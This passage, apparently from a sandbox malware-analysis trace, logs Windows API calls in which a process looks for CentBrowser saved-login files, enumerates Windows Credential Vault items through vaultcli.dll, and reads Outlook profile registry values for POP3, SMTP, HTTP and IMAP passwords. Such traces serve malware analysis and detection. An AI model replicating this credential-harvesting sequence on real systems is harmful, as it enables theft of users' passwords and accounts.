() returned 0x900000 [0203.487] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.487] lstrlenA (lpString="ACmkdJr") returned 7 [0203.487] lstrlenA (lpString="ACmkdJr") returned 7 [0203.487] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.487] lstrcpyA (in: lpString1=0x2d80000, lpString2="ACmkdJr" | out: lpString1="ACmkdJr") returned="ACmkdJr" [0203.487] lstrlenA (lpString="ACmkdJr") returned 7 [0203.487] lstrlenA (lpString="ACmkdJr") returned 7 [0203.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.487] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.487] lstrlenA (lpString="ACmkdJr") returned 7 [0203.487] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="ACmkdJr") returned 8 [0203.487] lstrlenW (lpString="ACmkdJr") returned 7 [0203.487] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.488] lstrlenW (lpString="ACmkdJr") returned 7 [0203.488] lstrcpyW (in: lpString1=0x2e20000, lpString2="ACmkdJr" | out: lpString1="ACmkdJr") returned="ACmkdJr" [0203.488] lstrlenW (lpString="ACmkdJr") returned 7 [0203.488] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.488] lstrcpyW (in: lpString1=0x2eb0000, lpString2="ACmkdJr" | out: lpString1="ACmkdJr") returned="ACmkdJr" [0203.488] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.488] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.489] lstrlenW (lpString="ACmkdJr") returned 7 [0203.489] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.489] lstrcatW (in: lpString1="", lpString2="ACmkdJr" | out: lpString1="ACmkdJr") returned="ACmkdJr" [0203.489] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.489] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.490] GetProcessHeap () returned 0x900000 [0203.490] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.490] lstrlenW (lpString="ACmkdJr") returned 7 [0203.490] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.490] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.490] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.490] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.490] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="ACmkdJr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ACmkdJr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ACmkdJr" [0203.490] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.490] lstrlenW (lpString=".tmp") returned 4 [0203.491] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.491] lstrlenW (lpString=".tmp") returned 4 [0203.491] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.491] lstrlenW (lpString=".tmp") returned 4 [0203.491] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ACmkdJr") returned 53 [0203.491] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.491] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.491] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.492] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ACmkdJr", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ACmkdJr.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ACmkdJr.tmp" [0203.492] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.492] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.492] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.492] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.492] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.492] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.492] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.492] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.493] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.493] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.493] lstrlenW (lpString="\\CentBrowser\\User Data\\Default\\Login Data") returned 41 [0203.493] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.493] lstrlenW (lpString="\\CentBrowser\\User Data\\Default\\Login Data") returned 41 [0203.493] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\CentBrowser\\User Data\\Default\\Login Data" | out: lpString1="\\CentBrowser\\User Data\\Default\\Login Data") returned="\\CentBrowser\\User Data\\Default\\Login Data" [0203.493] lstrlenW (lpString="\\CentBrowser\\User Data\\Default\\Login Data") returned 41 [0203.493] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.493] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.493] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.494] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.494] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\CentBrowser\\User Data\\Default\\Login Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\CentBrowser\\User Data\\Default\\Login Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\CentBrowser\\User Data\\Default\\Login Data" [0203.494] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.494] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.494] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.494] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.495] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.495] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.495] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.495] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.495] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.495] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.495] lstrlenW (lpString="\\CentBrowser\\User Data\\Local State") returned 34 [0203.495] VirtualAlloc (lpAddress=0x0, dwSize=0x46, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.496] lstrlenW (lpString="\\CentBrowser\\User Data\\Local State") returned 34 [0203.496] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\CentBrowser\\User Data\\Local State" | out: lpString1="\\CentBrowser\\User Data\\Local State") returned="\\CentBrowser\\User Data\\Local State" [0203.496] lstrlenW (lpString="\\CentBrowser\\User Data\\Local State") returned 34 [0203.496] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.496] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.496] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.496] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.496] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\CentBrowser\\User Data\\Local State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\CentBrowser\\User Data\\Local State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\CentBrowser\\User Data\\Local State" [0203.496] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.497] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\CentBrowser\\User Data\\Default\\Login Data") returned 0 [0203.497] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.497] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.497] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.497] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.498] LoadLibraryA (lpLibFileName="vaultcli.dll") returned 0x74a10000 [0203.998] lstrcmpA (lpString1="VaultAddItem", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultCloseVault", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultConfirmVaultAccess", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultCopyItem", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultCopyVault", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultCreateItemType", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultCreateVault", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultDeleteItemType", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultDeleteVault", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultEnumerateItemTypes", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultEnumerateItems", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultEnumerateVaults", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultFindItems", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultFree", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultGetInformation", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultGetItem", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultGetItemType", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultLoadVaults", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultLockVault", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultMoveItem", lpString2="VaultOpenVault") returned -1 [0203.998] lstrcmpA (lpString1="VaultOpenVault", lpString2="VaultOpenVault") returned 0 [0203.998] lstrcmpA (lpString1="VaultAddItem", lpString2="VaultCloseVault") returned -1 [0203.999] lstrcmpA (lpString1="VaultCloseVault", lpString2="VaultCloseVault") returned 0 [0203.999] lstrcmpA (lpString1="VaultAddItem", lpString2="VaultEnumerateItems") returned -1 [0203.999] lstrcmpA (lpString1="VaultCloseVault", lpString2="VaultEnumerateItems") returned -1 [0203.999] lstrcmpA (lpString1="VaultConfirmVaultAccess", lpString2="VaultEnumerateItems") returned -1 [0203.999] lstrcmpA (lpString1="VaultCopyItem", lpString2="VaultEnumerateItems") returned -1 [0203.999] lstrcmpA (lpString1="VaultCopyVault", lpString2="VaultEnumerateItems") returned -1 [0203.999] lstrcmpA (lpString1="VaultCreateItemType", lpString2="VaultEnumerateItems") returned -1 [0203.999] lstrcmpA (lpString1="VaultCreateVault", lpString2="VaultEnumerateItems") returned -1 [0203.999] lstrcmpA (lpString1="VaultDeleteItemType", lpString2="VaultEnumerateItems") returned -1 [0203.999] lstrcmpA (lpString1="VaultDeleteVault", lpString2="VaultEnumerateItems") returned -1 [0203.999] lstrcmpA (lpString1="VaultEnumerateItemTypes", lpString2="VaultEnumerateItems") returned 1 [0203.999] lstrcmpA (lpString1="VaultEnumerateItems", lpString2="VaultEnumerateItems") returned 0 [0203.999] lstrcmpA (lpString1="VaultAddItem", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultCloseVault", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultConfirmVaultAccess", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultCopyItem", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultCopyVault", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultCreateItemType", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultCreateVault", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultDeleteItemType", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultDeleteVault", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultEnumerateItemTypes", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultEnumerateItems", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultEnumerateVaults", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultFindItems", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultFree", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultGetInformation", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultGetItem", lpString2="VaultGetItem") returned 0 [0203.999] lstrcmpA (lpString1="VaultAddItem", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultCloseVault", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultConfirmVaultAccess", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultCopyItem", lpString2="VaultGetItem") returned -1 [0203.999] lstrcmpA (lpString1="VaultCopyVault", lpString2="VaultGetItem") returned -1 [0204.000] lstrcmpA (lpString1="VaultCreateItemType", lpString2="VaultGetItem") returned -1 [0204.000] lstrcmpA (lpString1="VaultCreateVault", lpString2="VaultGetItem") returned -1 [0204.000] lstrcmpA (lpString1="VaultDeleteItemType", lpString2="VaultGetItem") returned -1 [0204.000] lstrcmpA (lpString1="VaultDeleteVault", lpString2="VaultGetItem") returned -1 [0204.000] lstrcmpA (lpString1="VaultEnumerateItemTypes", lpString2="VaultGetItem") returned -1 [0204.000] lstrcmpA (lpString1="VaultEnumerateItems", lpString2="VaultGetItem") returned -1 [0204.000] lstrcmpA (lpString1="VaultEnumerateVaults", lpString2="VaultGetItem") returned -1 [0204.000] lstrcmpA (lpString1="VaultFindItems", lpString2="VaultGetItem") returned -1 [0204.000] lstrcmpA (lpString1="VaultFree", lpString2="VaultGetItem") returned -1 [0204.000] lstrcmpA (lpString1="VaultGetInformation", lpString2="VaultGetItem") returned -1 [0204.000] lstrcmpA (lpString1="VaultGetItem", lpString2="VaultGetItem") returned 0 [0204.000] lstrcmpA (lpString1="VaultAddItem", lpString2="VaultFree") returned -1 [0204.000] lstrcmpA (lpString1="VaultCloseVault", lpString2="VaultFree") returned -1 [0204.000] lstrcmpA (lpString1="VaultConfirmVaultAccess", lpString2="VaultFree") returned -1 [0204.000] lstrcmpA (lpString1="VaultCopyItem", lpString2="VaultFree") returned -1 [0204.000] lstrcmpA (lpString1="VaultCopyVault", lpString2="VaultFree") returned -1 [0204.000] lstrcmpA (lpString1="VaultCreateItemType", lpString2="VaultFree") returned -1 [0204.000] lstrcmpA (lpString1="VaultCreateVault", lpString2="VaultFree") returned -1 [0204.000] lstrcmpA (lpString1="VaultDeleteItemType", lpString2="VaultFree") returned -1 [0204.000] lstrcmpA (lpString1="VaultDeleteVault", lpString2="VaultFree") returned -1 [0204.000] lstrcmpA (lpString1="VaultEnumerateItemTypes", lpString2="VaultFree") returned -1 [0204.000] lstrcmpA (lpString1="VaultEnumerateItems", lpString2="VaultFree") returned -1 [0204.000] lstrcmpA (lpString1="VaultEnumerateVaults", lpString2="VaultFree") returned -1 [0204.000] lstrcmpA (lpString1="VaultFindItems", lpString2="VaultFree") returned -1 [0204.000] lstrcmpA (lpString1="VaultFree", lpString2="VaultFree") returned 0 [0204.000] VaultOpenVault () returned 0x0 [0204.595] VaultEnumerateItems () returned 0x0 [0204.595] VaultCloseVault () returned 0x0 [0204.596] FreeLibrary (hLibModule=0x74a10000) returned 1 [0204.597] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0204.597] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0204.597] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0204.597] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0xf003f, phkResult=0x415fa94 | out: phkResult=0x415fa94*=0x0) returned 0x2 [0204.597] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0xf003f, phkResult=0x415fa94 | out: phkResult=0x415fa94*=0x2a4) returned 0x0 [0204.597] lstrcpyW (in: lpString1=0x415ea88, lpString2="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" [0204.597] RegQueryInfoKeyW (in: hKey=0x2a4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x415fa8c, lpcbMaxSubKeyLen=0x415fa90, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x415fa8c*=0x4, lpcbMaxSubKeyLen=0x415fa90, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0204.597] RegEnumKeyExW (in: hKey=0x2a4, dwIndex=0x0, lpName=0x415ca88, lpcchName=0x415fa90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000001", lpcchName=0x415fa90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0204.598] RegCloseKey (hKey=0x2a4) returned 0x0 [0204.598] lstrcpyW (in: lpString1=0x415da88, lpString2="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" [0204.598] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", lpString2="\\" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" [0204.598] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\", lpString2="00000001" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001" [0204.598] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0xf003f, phkResult=0x415fa94 | out: phkResult=0x415fa94*=0x2a4) returned 0x0 [0204.598] RegQueryValueExW (in: hKey=0x2a4, lpValueName="Account Name", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x4d, lpcbData=0x415ca64*=0x28) returned 0x0 [0204.598] lstrlenW (lpString="Mobile Address Book") returned 19 [0204.598] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0204.599] lstrlenW (lpString="Mobile Address Book") returned 19 [0204.599] lstrcpyW (in: lpString1=0x2d80000, lpString2="Mobile Address Book" | out: lpString1="Mobile Address Book") returned="Mobile Address Book" [0204.599] lstrlenW (lpString="Mobile Address Book") returned 19 [0204.599] VirtualAlloc (lpAddress=0x0, dwSize=0x2a, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0204.599] lstrcatW (in: lpString1="", lpString2="Mobile Address Book" | out: lpString1="Mobile Address Book") returned="Mobile Address Book" [0204.599] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.599] RegQueryValueExW (in: hKey=0x2a4, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.599] RegQueryValueExW (in: hKey=0x2a4, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.600] RegQueryValueExW (in: hKey=0x2a4, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.600] RegQueryValueExW (in: hKey=0x2a4, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.600] RegQueryValueExW (in: hKey=0x2a4, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.600] RegQueryValueExW (in: hKey=0x2a4, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.600] RegQueryValueExW (in: hKey=0x2a4, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.600] RegQueryValueExW (in: hKey=0x2a4, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.600] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0204.600] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.600] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0204.600] RegCloseKey (hKey=0x2a4) returned 0x0 [0204.600] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0xf003f, phkResult=0x415fa94 | out: phkResult=0x415fa94*=0x2a4) returned 0x0 [0204.601] RegEnumKeyExW (in: hKey=0x2a4, dwIndex=0x1, lpName=0x415ca88, lpcchName=0x415fa90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000002", lpcchName=0x415fa90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0204.601] RegCloseKey (hKey=0x2a4) returned 0x0 [0204.601] lstrcpyW (in: lpString1=0x415da88, lpString2="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" | out: 